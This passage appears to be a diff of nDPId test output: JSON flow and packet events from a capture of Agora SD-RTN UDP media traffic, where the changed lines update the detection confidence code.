00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1649336894951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1649336894951,"pkt":"eJS0JASgYDjgxTWgCABFoAEHID5AAD8RRp\/AqAJkZ2io9Lq9H8IA8xyaAPT7iQAAIQAAAAAABFNOSQAdADEwMy0xMDQtMTY4LTI0NC5lZGdlLmFnb3JhLmlvUERNRAAAQ1BUT4EATk9OQyAAAAEYbST35dCSgu\/oSnUR68F1zmWE4lAIXeVnuX\/spWFBRUFEBABBRVNHUFVCU0EABCxrWMSJi3cMLo\/DcWomBJZiLPz9wNFAvUHb5Ktqfn+HKAOaK2+kuXH+Fid9l8Sz2DtqO3av9OcynM+pLX4g3fFLRVhTBABQMjU2Q0NSVCgA\/5fBj+URmB9wbQTGCLgnmdkWCQy4aJAWEpSWft+heUioR7HtGh8+Yg=="} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336897978,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336897978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1649336897978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336897978,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsfxAAD8R0PjAqAJkx74sh7q9H8IA8lE2AGPBagAAIQAAAAAABFNOSQAcADE5OS0xOTAtNDQtMTM1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARhWspSev4bzOG6wPmQQKUboN8Gv4KKtUlkLZKbYgUFFQUQEAEFFU0dQVUJTQQAE\/uPsUJ+bwmSDxeW3DfmCaDuvCSEjPerODHPdU7+ne1r1GiXACFb9BWan+QfnXj1zHCijdF+kn513z2pa56JEA0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336897978,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336897978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336897978,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336897978,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1649336897978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336897978,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsf1AAD8R0PfAqAJkx74sh7q9H8IA8lE2AGPBagAAIQAAAAAABFNOSQAcADE5OS0xOTAtNDQtMTM1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARhWspSev4bzOG6wPmQQKUboN8Gv4KKtUlkLZKbYgUFFQUQEAEFFU0dQVUJTQQAE\/uPsUJ+bwmSDxeW3DfmCaDuvCSEjPerODHPdU7+ne1r1GiXACFb9BWan+QfnXj1zHCijdF+kn513z2pa56JEA0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1649336897978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336897978,"pkt":"eJS0JASgYDjgxTWgCABFoAEGsf5AAD8R0PbAqAJkx74sh7q9H8IA8lE2AGPBagAAIQAAAAAABFNOSQAcADE5OS0xOTAtNDQtMTM1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARhWspSev4bzOG6wPmQQKUboN8Gv4KKtUlkLZKbYgUFFQUQEAEFFU0dQVUJTQQAE\/uPsUJ+bwmSDxeW3DfmCaDuvCSEjPerODHPdU7+ne1r1GiXACFb9BWan+QfnXj1zHCijdF+kn513z2pa56JEA0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336954948,"flow_last_seen":1649336954948,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336954948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1649336954948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336954948,"pkt":"eJS0JASgYDjgxTWgCABFoAEF4wlAAD8RUlDAqAJkgAHB4Lq9H8IA8axfABWxMwAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGKkp\/CNorO\/XtfrOePWN81A9C9MAoawVdiTlkB5YQUVBRAQAQUVTR1BVQlNBAARS2JQLkIR0s0U+a9LbirTcsZ9Vc9wcY7Rv6+\/oeg89wuq8mG2Fa8SOZxeJGZ5O5HkduxX+YHHWArj227MAvDIiS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336954948,"flow_last_seen":1649336954948,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336954948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336954948,"flow_last_seen":1649336954948,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336954948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1649336954948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336954948,"pkt":"eJS0JASgYDjgxTWgCABFoAEF4wpAAD8RUk\/AqAJkgAHB4Lq9H8IA8axfABWxMwAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGKkp\/CNorO\/XtfrOePWN81A9C9MAoawVdiTlkB5YQUVBRAQAQUVTR1BVQlNBAARS2JQLkIR0s0U+a9LbirTcsZ9Vc9wcY7Rv6+\/oeg89wuq8mG2Fa8SOZxeJGZ5O5HkduxX+YHHWArj227MAvDIiS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1649336954949,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336954949,"pkt":"eJS0JASgYDjgxTWgCABFoAEF4wtAAD8RUk7AqAJkgAHB4Lq9H8IA8axfABWxMwAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGKkp\/CNorO\/XtfrOePWN81A9C9MAoawVdiTlkB5YQUVBRAQAQUVTR1BVQlNBAARS2JQLkIR0s0U+a9LbirTcsZ9Vc9wcY7Rv6+\/oeg89wuq8mG2Fa8SOZxeJGZ5O5HkduxX+YHHWArj227MAvDIiS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960165,"flow_last_seen":1649336960165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336960165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1649336960165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336960165,"pkt":"eJS0JASgYDjgxTWgCABFoAEGpW5AAD8R\/yDAqAJkF\/i6s7q9H8IA8oQKAESwUAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARivCCej2aaoROMARk9sMb0XKldVwG681Q77zoC7SEFFQUQEAEFFU0dQVUJTQQAE5YgDI5g5+QGR1stX7QhavuK7KqX6oED0uD4Fc2TkyI7XxLsWQr7+f4R1SzrhxtNatAeysc511jU5dmeO5Y1oxktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960165,"flow_last_seen":1649336960165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336960165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960165,"flow_last_seen":1649336960165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336960165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1649336960166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336960166,"pkt":"eJS0JASgYDjgxTWgCABFoAEGpW9AAD8R\/x\/AqAJkF\/i6s7q9H8IA8oQKAESwUAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARivCCej2aaoROMARk9sMb0XKldVwG681Q77zoC7SEFFQUQEAEFFU0dQVUJTQQAE5YgDI5g5+QGR1stX7QhavuK7KqX6oED0uD4Fc2TkyI7XxLsWQr7+f4R1SzrhxtNatAeysc511jU5dmeO5Y1oxktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1649336960166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336960166,"pkt":"eJS0JASgYDjgxTWgCABFoAEGpXBAAD8R\/x7AqAJkF\/i6s7q9H8IA8oQKAESwUAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARivCCej2aaoROMARk9sMb0XKldVwG681Q77zoC7SEFFQUQEAEFFU0dQVUJTQQAE5YgDI5g5+QGR1stX7QhavuK7KqX6oED0uD4Fc2TkyI7XxLsWQr7+f4R1SzrhxtNatAeysc511jU5dmeO5Y1oxktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336960225,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1649336960225,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336960225,"pkt":"eJS0JASgYDjgxTWgCABFoAEFndlAAD8Rl4HAqAJkgAHB39c2H8IA8ZOLAOX2hQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFS\/AsDN3E0MNs1Tty30iNlSbZLZAsCEHJVAePrqQUVBRAQAQUVTR1BVQlNBAAQqYroImCQdoRbDik\/ymuTlszSH0nDax6AHnZ1weDXnkcuKbi1RntRVdWy9AbKpXFvYI3K9BK3zZkKCIaTC3smwS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336960225,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336960225,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1649336960225,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336960225,"pkt":"eJS0JASgYDjgxTWgCABFoAEFndpAAD8Rl4DAqAJkgAHB39c2H8IA8ZOLAOX2hQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFS\/AsDN3E0MNs1Tty30iNlSbZLZAsCEHJVAePrqQUVBRAQAQUVTR1BVQlNBAAQqYroImCQdoRbDik\/ymuTlszSH0nDax6AHnZ1weDXnkcuKbi1RntRVdWy9AbKpXFvYI3K9BK3zZkKCIaTC3smwS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1649336960225,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336960225,"pkt":"eJS0JASgYDjgxTWgCABFoAEFndtAAD8Rl3\/AqAJkgAHB39c2H8IA8ZOLAOX2hQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFS\/AsDN3E0MNs1Tty30iNlSbZLZAsCEHJVAePrqQUVBRAQAQUVTR1BVQlNBAAQqYroImCQdoRbDik\/ymuTlszSH0nDax6AHnZ1weDXnkcuKbi1RntRVdWy9AbKpXFvYI3K9BK3zZkKCIaTC3smwS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336965165,"flow_last_seen":1649336965165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336965165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1649336965165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336965165,"pkt":"eJS0JASgYDjgxTWgCABFoAEGAFRAAD8RpDrAqAJkF\/i6tLq9H8IA8ukWAHKNlwAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARi0N1CFxirRT+Qnnrz\/pyBDu6aGfdoDtspPZ5eKK0FFQUQEAEFFU0dQVUJTQQAE3Cx8VYdzNil7sFRPDWbBkTVwDhDpZB0H1ndvXVYUqBYfSWs33e8hvSgcWboTgtdnoWm6BanWQW5l3Pfuz5zOwktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336965165,"flow_last_seen":1649336965165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336965165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336965165,"flow_last_seen":1649336965165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336965165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1649336965165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336965165,"pkt":"eJS0JASgYDjgxTWgCABFoAEGAFVAAD8RpDnAqAJkF\/i6tLq9H8IA8ukWAHKNlwAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARi0N1CFxirRT+Qnnrz\/pyBDu6aGfdoDtspPZ5eKK0FFQUQEAEFFU0dQVUJTQQAE3Cx8VYdzNil7sFRPDWbBkTVwDhDpZB0H1ndvXVYUqBYfSWs33e8hvSgcWboTgtdnoWm6BanWQW5l3Pfuz5zOwktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1649336965166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336965166,"pkt":"eJS0JASgYDjgxTWgCABFoAEGAFZAAD8RpDjAqAJkF\/i6tLq9H8IA8ukWAHKNlwAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARi0N1CFxirRT+Qnnrz\/pyBDu6aGfdoDtspPZ5eKK0FFQUQEAEFFU0dQVUJTQQAE3Cx8VYdzNil7sFRPDWbBkTVwDhDpZB0H1ndvXVYUqBYfSWs33e8hvSgcWboTgtdnoWm6BanWQW5l3Pfuz5zOwktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":401,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":401,"packets-processed":400,"total-skipped-flows":0,"total-l4-payload-len":94737,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":1,"current-active-flows":8,"total-active-flows":26,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":155,"global_ts_msec":1649337802272} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":498,"flow_tot_l4_payload_len":4167,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
